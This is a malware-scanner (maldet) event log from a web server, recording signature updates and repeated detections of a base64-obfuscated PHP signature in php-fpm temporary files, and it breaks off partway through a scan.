Jan 17 2026 04:53:39 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696a6bd4c1033.php
Jan 17 2026 04:53:39 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696b11484ae1f.php
Jan 17 2026 04:53:39 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696abca305edd.php
Jan 17 2026 04:53:39 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696a9c9b63d6f.php
Jan 17 2026 04:53:39 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696abd7477635.php
Jan 17 2026 04:53:39 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696b3f3467d2d.php
Jan 17 2026 04:53:39 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696a6ba2ddfea.php
Jan 17 2026 04:53:39 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696abd787dcaa.php
Jan 17 2026 04:53:39 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696a6bf2e1221.php
Jan 17 2026 04:53:39 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696a6bec22c2e.php
Jan 17 2026 04:53:39 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696abb48364cb.php
Jan 17 2026 04:53:39 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696a9a7b2a43e.php
Jan 17 2026 04:53:39 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696a6bfdc97e5.php
Jan 17 2026 04:53:39 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696b117a17a47.php
Jan 17 2026 04:53:39 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696a9ced7c2c6.php
Jan 17 2026 04:53:39 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696a6c817bd2c.php
Jan 17 2026 04:53:39 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696a6c8760345.php
Jan 17 2026 04:53:39 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696a6921253e6.php
Jan 17 2026 04:53:39 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696adc984610b.php
Jan 17 2026 04:53:39 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696a6c83e6fc8.php
Jan 17 2026 04:53:39 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696b401c5097f.php
Jan 17 2026 04:53:39 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696a6be1535a1.php
Jan 17 2026 04:53:39 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696a9c4972915.php
Jan 17 2026 04:53:39 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696a6bd4c1033.php
Jan 17 2026 04:53:39 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696b11484ae1f.php
Jan 17 2026 04:53:39 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696abca305edd.php
Jan 17 2026 04:53:39 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696a9c9b63d6f.php
Jan 17 2026 04:53:39 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696abd7477635.php
Jan 17 2026 04:53:40 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696b3f3467d2d.php
Jan 17 2026 04:53:40 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696a6ba2ddfea.php
Jan 17 2026 04:53:40 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696abd787dcaa.php
Jan 17 2026 04:53:40 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696a6bf2e1221.php
Jan 17 2026 04:53:40 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696a6bec22c2e.php
Jan 17 2026 04:53:40 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696abb48364cb.php
Jan 17 2026 04:53:40 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696a9a7b2a43e.php
Jan 17 2026 04:53:40 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696a6bfdc97e5.php
Jan 17 2026 04:53:40 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696b117a17a47.php
Jan 17 2026 04:53:40 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696a9ced7c2c6.php
Jan 17 2026 04:53:40 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696a6c817bd2c.php
Jan 17 2026 04:53:40 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696a6c8760345.php
Jan 17 2026 04:53:40 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696a6921253e6.php
Jan 17 2026 04:53:40 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696adc984610b.php
Jan 17 2026 04:53:40 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696a6c83e6fc8.php
Jan 17 2026 04:53:40 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696b401c5097f.php
Jan 17 2026 04:53:40 web1 maldet(504551): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696a6be1535a1.php
Jan 17 2026 04:53:40 web1 maldet(504551): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 28564, malware hits 46, cleaned hits 0, time 369s
Jan 17 2026 04:53:40 web1 maldet(504551): {scan} scan report saved, to view run: maldet --report 260117-0447.504551
Jan 17 2026 04:53:40 web1 maldet(504551): {scan} quarantine is disabled! set quarantine_hits=1 in conf.maldet or to quarantine results run: maldet -q 260117-0447.504551
Jan 18 2026 04:26:25 web1 maldet(891298): {update} checking for available updates...
Jan 18 2026 04:26:25 web1 maldet(891298): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Jan 18 2026 04:26:25 web1 maldet(891298): {update} hashing install files and checking against server...
Jan 18 2026 04:26:26 web1 maldet(891298): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Jan 18 2026 04:26:26 web1 maldet(891298): {update} latest version already installed.
Jan 18 2026 04:26:26 web1 maldet(891408): {sigup} performing signature update check...
Jan 18 2026 04:26:26 web1 maldet(891408): {sigup} local signature set is version 20260116700884
Jan 18 2026 04:26:26 web1 maldet(891408): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Jan 18 2026 04:26:26 web1 maldet(891408): {sigup} latest signature set already installed
Jan 18 2026 04:26:26 web1 maldet(891496): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Jan 18 2026 04:26:26 web1 maldet(891496): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 18 2026 04:26:26 web1 maldet(891496): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Jan 18 2026 04:26:26 web1 maldet(891496): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Jan 18 2026 04:26:26 web1 maldet(891496): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Jan 18 2026 04:26:57 web1 maldet(891496): {scan} file list completed in 31s, found 936 files...
Jan 18 2026 04:26:57 web1 maldet(891496): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Jan 18 2026 04:26:57 web1 maldet(891496): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (936 files) in progress...
Jan 18 2026 04:27:19 web1 maldet(891496): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696c34c196931.php
Jan 18 2026 04:27:19 web1 maldet(891496): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696c38a76ebce.php
Jan 18 2026 04:27:19 web1 maldet(891496): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696c9b2fdd0ca.php
Jan 18 2026 04:27:19 web1 maldet(891496): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696c372db5dbd.php
Jan 18 2026 04:27:19 web1 maldet(891496): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696b72b3732f3.php
Jan 18 2026 04:27:20 web1 maldet(891496): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696c6586e244b.php
Jan 18 2026 04:27:20 web1 maldet(891496): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696c3428bc2d4.php
Jan 18 2026 04:27:20 web1 maldet(891496): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696c6b18ef258.php
Jan 18 2026 04:27:20 web1 maldet(891496): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696c34c196931.php
Jan 18 2026 04:27:20 web1 maldet(891496): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696c38a76ebce.php
Jan 18 2026 04:27:20 web1 maldet(891496): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696c9b2fdd0ca.php
Jan 18 2026 04:27:20 web1 maldet(891496): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696c372db5dbd.php
Jan 18 2026 04:27:20 web1 maldet(891496): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696b72b3732f3.php
Jan 18 2026 04:27:20 web1 maldet(891496): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696c6586e244b.php
Jan 18 2026 04:27:20 web1 maldet(891496): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696c3428bc2d4.php
Jan 18 2026 04:27:20 web1 maldet(891496): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696c6b18ef258.php
Jan 18 2026 04:27:20 web1 maldet(891496): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 936, malware hits 16, cleaned hits 0, time 54s
Jan 18 2026 04:27:20 web1 maldet(891496): {scan} scan report saved, to view run: maldet --report 260118-0426.891496
Jan 18 2026 04:27:20 web1 maldet(891496): {scan} quarantine is disabled! set quarantine_hits=1 in conf.maldet or to quarantine results run: maldet -q 260118-0426.891496
Jan 19 2026 04:31:41 web1 maldet(1249633): {update} checking for available updates...
Jan 19 2026 04:31:41 web1 maldet(1249633): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Jan 19 2026 04:31:41 web1 maldet(1249633): {update} hashing install files and checking against server...
Jan 19 2026 04:31:41 web1 maldet(1249633): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Jan 19 2026 04:31:41 web1 maldet(1249633): {update} latest version already installed.
Jan 19 2026 04:31:41 web1 maldet(1249743): {sigup} performing signature update check...
Jan 19 2026 04:31:41 web1 maldet(1249743): {sigup} local signature set is version 20260116700884
Jan 19 2026 04:31:41 web1 maldet(1249743): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Jan 19 2026 04:31:41 web1 maldet(1249743): {sigup} new signature set 202601191671201 available
Jan 19 2026 04:31:41 web1 maldet(1249743): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Jan 19 2026 04:31:42 web1 maldet(1249743): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Jan 19 2026 04:31:42 web1 maldet(1249743): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz.md5
Jan 19 2026 04:31:42 web1 maldet(1249743): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Jan 19 2026 04:31:42 web1 maldet(1249743): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Jan 19 2026 04:31:42 web1 maldet(1249743): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz.md5
Jan 19 2026 04:31:42 web1 maldet(1249743): {sigup} verified md5sum of maldet-sigpack.tgz
Jan 19 2026 04:31:42 web1 maldet(1249743): {sigup} unpacked and installed maldet-sigpack.tgz
Jan 19 2026 04:31:42 web1 maldet(1249743): {sigup} verified md5sum of maldet-clean.tgz
Jan 19 2026 04:31:42 web1 maldet(1249743): {sigup} unpacked and installed maldet-clean.tgz
Jan 19 2026 04:31:42 web1 maldet(1249743): {sigup} signature set update completed
Jan 19 2026 04:31:42 web1 maldet(1249743): {sigup} 17638 signatures (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 19 2026 04:31:42 web1 maldet(1249948): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Jan 19 2026 04:31:43 web1 maldet(1249948): {scan} signatures loaded: 17638 (14801 MD5 | 2054 HEX | 783 YARA | 0 USER)
Jan 19 2026 04:31:43 web1 maldet(1249948): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Jan 19 2026 04:31:43 web1 maldet(1249948): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Jan 19 2026 04:31:43 web1 maldet(1249948): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Jan 19 2026 04:32:17 web1 maldet(1249948): {scan} file list completed in 34s, found 635 files...
Jan 19 2026 04:32:17 web1 maldet(1249948): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Jan 19 2026 04:32:17 web1 maldet(1249948): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (635 files) in progress...
Jan 19 2026 04:32:35 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696cfd3f22bb4.php
Jan 19 2026 04:32:35 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696cfddd84d48.php
Jan 19 2026 04:32:35 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696ccda51ac8e.php
Jan 19 2026 04:32:35 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696cfcc9253a8.php
Jan 19 2026 04:32:35 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696cc9f27835e.php
Jan 19 2026 04:32:35 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696df0596001f.php
Jan 19 2026 04:32:35 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696cfcbb77238.php
Jan 19 2026 04:32:35 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696d5f6af0a61.php
Jan 19 2026 04:32:35 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696cc80a4b268.php
Jan 19 2026 04:32:36 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696cfc5584676.php
Jan 19 2026 04:32:36 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696cfc483fb3c.php
Jan 19 2026 04:32:36 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696d8fe95eafa.php
Jan 19 2026 04:32:36 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696dc3b25dd09.php
Jan 19 2026 04:32:36 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696dc2fb3e792.php
Jan 19 2026 04:32:36 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696d5d7858511.php
Jan 19 2026 04:32:36 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696cfc6c8e6f1.php
Jan 19 2026 04:32:36 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696defbfc5805.php
Jan 19 2026 04:32:36 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696cfc60cd1f3.php
Jan 19 2026 04:32:36 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696dc33682b6b.php
Jan 19 2026 04:32:36 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696cfd3f22bb4.php
Jan 19 2026 04:32:36 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696cfddd84d48.php
Jan 19 2026 04:32:36 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696ccda51ac8e.php
Jan 19 2026 04:32:36 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696cfcc9253a8.php
Jan 19 2026 04:32:36 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696cc9f27835e.php
Jan 19 2026 04:32:36 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696df0596001f.php
Jan 19 2026 04:32:36 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696cfcbb77238.php
Jan 19 2026 04:32:36 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696d5f6af0a61.php
Jan 19 2026 04:32:36 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696cc80a4b268.php
Jan 19 2026 04:32:36 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696cfc5584676.php
Jan 19 2026 04:32:36 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696cfc483fb3c.php
Jan 19 2026 04:32:36 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696d8fe95eafa.php
Jan 19 2026 04:32:36 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696dc3b25dd09.php
Jan 19 2026 04:32:37 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696dc2fb3e792.php
Jan 19 2026 04:32:37 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696d5d7858511.php
Jan 19 2026 04:32:37 web1 maldet(1249948): {hit} malware hit {HEX}php.nested.base64.652 found for /var/tmp/systemd-private-b1021f0513414e76a4e43245f724063b-ea-php83-php-fpm.service-R7mwgy/tmp/run_696cfc6c8e6f1.php
